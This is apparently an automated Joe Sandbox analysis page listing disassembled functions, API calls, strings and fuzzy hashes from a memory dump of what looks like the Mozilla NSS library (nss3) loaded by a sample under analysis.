PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,6BBC6A5E,00000001,00000000,?,6BBC6540,?,0000000D,00000000,?), ref: 6BBF2CA2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID:
API String ID: 2580468248-0
Opcode ID: b242cbf0a78b49004ce82e2803d1ccea26d919b350f7445d4bd1de30f585a164
Instruction ID: a506e4d8cc2c1ad89e4d435de693923e1c9fb3dadcdd92bd0f9f575e6ae23e05
Opcode Fuzzy Hash: b242cbf0a78b49004ce82e2803d1ccea26d919b350f7445d4bd1de30f585a164
Instruction Fuzzy Hash: 85B1FFB5C006849FEB10DF68D881B9EF7B8FF09304F448569EC45A7211E739E996CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD2980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BBB9E71,?,?,6BBCF03D), ref: 6BBD29A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BBB9E71,?), ref: 6BBD29B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BBB9E71,?,?,6BBCF03D), ref: 6BBD29E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BBB9E71,?), ref: 6BBD29F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBB9E71,?), ref: 6BBD2A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBB9E71), ref: 6BBD2A13

Part of subcall function 6BC5DD70: TlsGetValue.KERNEL32 ref: 6BC5DD8C
Part of subcall function 6BC5DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BC5DDB4

PR_Unlock.NSS3(?), ref: 6BBD2A6A
TlsGetValue.KERNEL32 ref: 6BBD2A98
EnterCriticalSection.KERNEL32(?), ref: 6BBD2AAC
PL_HashTableLookup.NSS3(?,?), ref: 6BBD2ABC
PR_Unlock.NSS3(?), ref: 6BBD2AC9
TlsGetValue.KERNEL32 ref: 6BBD2B3D
EnterCriticalSection.KERNEL32(?), ref: 6BBD2B51
PL_HashTableLookup.NSS3(?,6BBB9E71), ref: 6BBD2B61
PR_Unlock.NSS3(?), ref: 6BBD2B6E

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID:
API String ID: 2204204336-0
Opcode ID: 5e9cb1e043c29509bb89c16f14cc98a42be1d48a854aaff490fd97b19d24811f
Instruction ID: fa7f046f836fd9c3f781474beb9af0e149018868319c0972096777cacbca673d
Opcode Fuzzy Hash: 5e9cb1e043c29509bb89c16f14cc98a42be1d48a854aaff490fd97b19d24811f
Instruction Fuzzy Hash: C671C676C00684AFEB119F34DC4196EB7B4FF15358B088564EC189B212FB39E991C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC4960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6BCC8061,?,?,?,?), ref: 6BCC497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6BCC499E
GetLastError.KERNEL32(?,?,6BCC8061,?,?,?,?), ref: 6BCC49AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6BCC8061,?,?,?,?), ref: 6BCC49C2

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6BCC8061,?,?,?,?), ref: 6BCC49D6
CreateSemaphoreA.KERNEL32(00000000,6BCC8061,7FFFFFFF,?), ref: 6BCC4A19
GetLastError.KERNEL32(?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4A52
GetLastError.KERNEL32(?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4A5A
free.MOZGLUE(00000000,?,?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4A6A
CreateSemaphoreA.KERNEL32(?,6BCC8061,7FFFFFFF,?), ref: 6BCC4A9A
free.MOZGLUE(?,?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4AAE
free.MOZGLUE(?,?,?,?,?,6BCC8061,?,?,?,?), ref: 6BCC4AC2

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: d45799e4e1c882dbf03af821aba895e5d8c0c3973929b50a2e98ece59924b46a
Instruction ID: 4ae5aabeadc22c5f6f4e065ba2781ff28d4c261d7ac6530278e77b456acae473
Opcode Fuzzy Hash: d45799e4e1c882dbf03af821aba895e5d8c0c3973929b50a2e98ece59924b46a
Instruction Fuzzy Hash: F841E374A102159BEB009FB9CC89B4BB7E8EB5A715F144028E919A7240EB78DA14C776

Uniqueness

Uniqueness Score: -1.00%

Function 6BCCABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BCCABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6BCCAC21

Part of subcall function 6BC770F0: LeaveCriticalSection.KERNEL32(6BCC0C7B), ref: 6BC7710D

EnterCriticalSection.KERNEL32(?), ref: 6BCCAC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6BCCAC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6BCCAC97
EnterCriticalSection.KERNEL32(?), ref: 6BCCACBF
PR_NewCondVar.NSS3(?), ref: 6BCCACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6BCCAD0D
PR_SetPollableEvent.NSS3(?), ref: 6BCCAD18
EnterCriticalSection.KERNEL32(?), ref: 6BCCAD31

Part of subcall function 6BC79890: TlsGetValue.KERNEL32(?,?,?,6BC797EB), ref: 6BC7989E

_PR_MD_UNLOCK.NSS3(?), ref: 6BCCAD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6BCCAD98
_PR_MD_UNLOCK.NSS3(?), ref: 6BCCADC5

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: 131c12f65eb554b84c64dba4f3f26547c2cf5830678c4792db367d104acbfb02
Instruction ID: 3b48f6de7ededc92411325656f70722be77929fa3bf0f062d502ffc683c8dc8f
Opcode Fuzzy Hash: 131c12f65eb554b84c64dba4f3f26547c2cf5830678c4792db367d104acbfb02
Instruction Fuzzy Hash: D361BEB28106009BC7209F24C885707B7F4FF94729F1585A9E8595B616F779FE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE4B80 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DestroyObject), ref: 6BBE4BA6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBE4BD7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE4BE9

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBE4BFF
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6BBE4C2D
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE4C3F
PR_LogPrint.NSS3(?,00000000), ref: 6BBE4C55

Strings

(CK_INVALID_HANDLE), xrefs: 6BBE4BDF, 6BBE4C35
hObject = 0x%x, xrefs: 6BBE4C17, 6BBE4C27
hSession = 0x%x, xrefs: 6BBE4BC1, 6BBE4BD1
C_DestroyObject, xrefs: 6BBE4BA1

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_DestroyObject
API String ID: 332880674-4243883364
Opcode ID: 825601f1b45b2a76b757803527d0298806cc477330dd4b21f2a823bc1715a179
Instruction ID: 68a40b6bbd9862c661032c7608e642a9dac9f3a5bedb0df8bedfa9af4e18d8de
Opcode Fuzzy Hash: 825601f1b45b2a76b757803527d0298806cc477330dd4b21f2a823bc1715a179
Instruction Fuzzy Hash: 1E310875940144ABE700DF24DD86F2F77A4EF4234DF444028E509AB211EB7CDA46CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD3BD0 Relevance: 18.2, APIs: 12, Instructions: 191COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE,?,?,?,00000001,00000000,?,?,6BBD3F23,?), ref: 6BBD3BEB
EnterCriticalSection.KERNEL32(?,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE,?,?,?,00000001,00000000,?,?,6BBD3F23,?), ref: 6BBD3BFF
PL_HashTableLookup.NSS3(?,6BBD3F23,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE,?,?,?,00000001,00000000,?,?,6BBD3F23), ref: 6BBD3C0F
PR_Unlock.NSS3(?,?,?,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE,?,?,?,00000001,00000000,?), ref: 6BBD3C1C

Part of subcall function 6BC5DD70: TlsGetValue.KERNEL32 ref: 6BC5DD8C
Part of subcall function 6BC5DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BC5DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE,?,?,?,00000001,00000000), ref: 6BBD3C5D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE,?,?,?,00000001), ref: 6BBD3C71
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE), ref: 6BBD3C81
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,F04D8B4E,6BBD3F23,?,6BBCE4CE), ref: 6BBD3C8E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,F04D8B4E,6BBD3F23), ref: 6BBD3D1B
EnterCriticalSection.KERNEL32(?), ref: 6BBD3D32
PL_HashTableLookup.NSS3(00000000,CCCCCCCC), ref: 6BBD3D42
PR_Unlock.NSS3(00000000), ref: 6BBD3D4F

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 667a61707e01ddb44fcdf6df6a6933a67702b08f8301bc64f51ba3a79a58bd4f
Instruction ID: 1ed3d9d39f224d62dcc4c2bbfe9b69341c4e141581bb186322f6adb411b458ce
Opcode Fuzzy Hash: 667a61707e01ddb44fcdf6df6a6933a67702b08f8301bc64f51ba3a79a58bd4f
Instruction Fuzzy Hash: 0571A075D002459FEB11DF24D84596EB7B4FF05318F484568EC589B312E73AE960CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBE910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6BBBE93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6BBBE94E
PORT_Alloc_Util.NSS3(00000001), ref: 6BBBE995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BBBE9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6BBBE9CA
PORT_Strdup_Util.NSS3(6BCF933E), ref: 6BBBEA17
PORT_Alloc_Util.NSS3(00000001), ref: 6BBBEA28

Part of subcall function 6BC10BE0: malloc.MOZGLUE(6BC08D2D,?,00000000,?), ref: 6BC10BF8
Part of subcall function 6BC10BE0: TlsGetValue.KERNEL32(6BC08D2D,?,00000000,?), ref: 6BC10C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BBBEA3C
free.MOZGLUE(?), ref: 6BBBEA69

Strings

http://, xrefs: 6BBBE935

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: c60df230f5492e906f7943189c4b532740f7a63c651aa13ce4dfb9c355b6780b
Instruction ID: ef531628ec1b5c174ad42fb81c485c3a252cba86c506f0088193ad547b33793c
Opcode Fuzzy Hash: c60df230f5492e906f7943189c4b532740f7a63c651aa13ce4dfb9c355b6780b
Instruction Fuzzy Hash: 7B417F74D741C69BEF604B688C817BE77A9EB07344F0008E1D8D4DB261EB3DD65AC2A6

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE2AF0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismList), ref: 6BBE2B0C
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6BBE2B59

Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BCC0BAB
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0BBA
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0D7E

PR_LogPrint.NSS3( pMechanismList = 0x%p,?), ref: 6BBE2B3E

Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(?), ref: 6BCC0B88
Part of subcall function 6BCC09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6BCC0C5D
Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BCC0C8D
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0C9C
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(?), ref: 6BCC0CD1
Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BCC0CEC
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0CFB
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BCC0D16
Part of subcall function 6BCC09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BCC0D26
Part of subcall function 6BCC09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BCC0D35
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6BCC0D65
Part of subcall function 6BCC09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BCC0D70
Part of subcall function 6BCC09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BCC0D90
Part of subcall function 6BCC09D0: free.MOZGLUE(00000000), ref: 6BCC0D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6BBE2B25

Part of subcall function 6BCC09D0: PR_Now.NSS3 ref: 6BCC0A22
Part of subcall function 6BCC09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BCC0A35
Part of subcall function 6BCC09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BCC0A66
Part of subcall function 6BCC09D0: PR_GetCurrentThread.NSS3 ref: 6BCC0A70
Part of subcall function 6BCC09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BCC0A9D
Part of subcall function 6BCC09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BCC0AC8
Part of subcall function 6BCC09D0: PR_vsmprintf.NSS3(?,?), ref: 6BCC0AE8
Part of subcall function 6BCC09D0: EnterCriticalSection.KERNEL32(?), ref: 6BCC0B19
Part of subcall function 6BCC09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BCC0B48
Part of subcall function 6BCC09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BCC0C76
Part of subcall function 6BCC09D0: PR_LogFlush.NSS3 ref: 6BCC0C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6BBE2BC0

Strings

pMechanismList = 0x%p, xrefs: 6BBE2B39
pulCount = 0x%p, xrefs: 6BBE2B54
*pulCount = 0x%x, xrefs: 6BBE2BBB
slotID = 0x%x, xrefs: 6BBE2B20
C_GetMechanismList, xrefs: 6BBE2B07

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: DebugOutputPrintStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pMechanismList = 0x%p$ pulCount = 0x%p$ slotID = 0x%x$C_GetMechanismList
API String ID: 1342304006-3652739913
Opcode ID: c262b76c556ed6ed5288b1ecc253b4cf0b3e834a340308112dcdec80306ecfbd
Instruction ID: ff9080c9d6b16b1439ed2e29c670627cdfab86025c42e632eb38f5be047d7d13
Opcode Fuzzy Hash: c262b76c556ed6ed5288b1ecc253b4cf0b3e834a340308112dcdec80306ecfbd
Instruction Fuzzy Hash: D321C175650145EFEB00DF64DD87E0DB7A5EB4239EF884068E9089B221E739D942CB72

Uniqueness

Uniqueness Score: -1.00%

Function 6BC36BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6BC40293), ref: 6BC36BC2
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36C13
NSS_GetAlgorithmPolicy.NSS3(?), ref: 6BC36C39
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BC36C6C
NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6BC36CAB
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36CEE
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36D2A
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36D6D
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36DBD
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36E13
PR_SetError.NSS3(FFFFD016,00000000), ref: 6BC36EE9

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Error$AlgorithmPolicy
String ID:
API String ID: 644051021-0
Opcode ID: 2a0b35eb244bc6bfce6b79dea66bd990768f47b3aadd28726d78fdcb6b1c8f8d
Instruction ID: 9b1341182abd4d585c4976cf8be8af5c59267e6fdc3c457c3f513459384e75ff
Opcode Fuzzy Hash: 2a0b35eb244bc6bfce6b79dea66bd990768f47b3aadd28726d78fdcb6b1c8f8d
Instruction Fuzzy Hash: 37915932D2C9648BDB009BACDC417683730EF42B2CF9543B5D056AF2D1F36997598352

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC2AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6BCC2AE8
strdup.MOZGLUE(00000000), ref: 6BCC2AFA
PR_ExitMonitor.NSS3 ref: 6BCC2B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6BCC2B1E
strdup.MOZGLUE(.;\lib), ref: 6BCC2B32
PR_ExitMonitor.NSS3 ref: 6BCC2B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6BCC2B59

Strings

.;\lib, xrefs: 6BCC2B29, 6BCC2B31
LD_LIBRARY_PATH, xrefs: 6BCC2B19

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

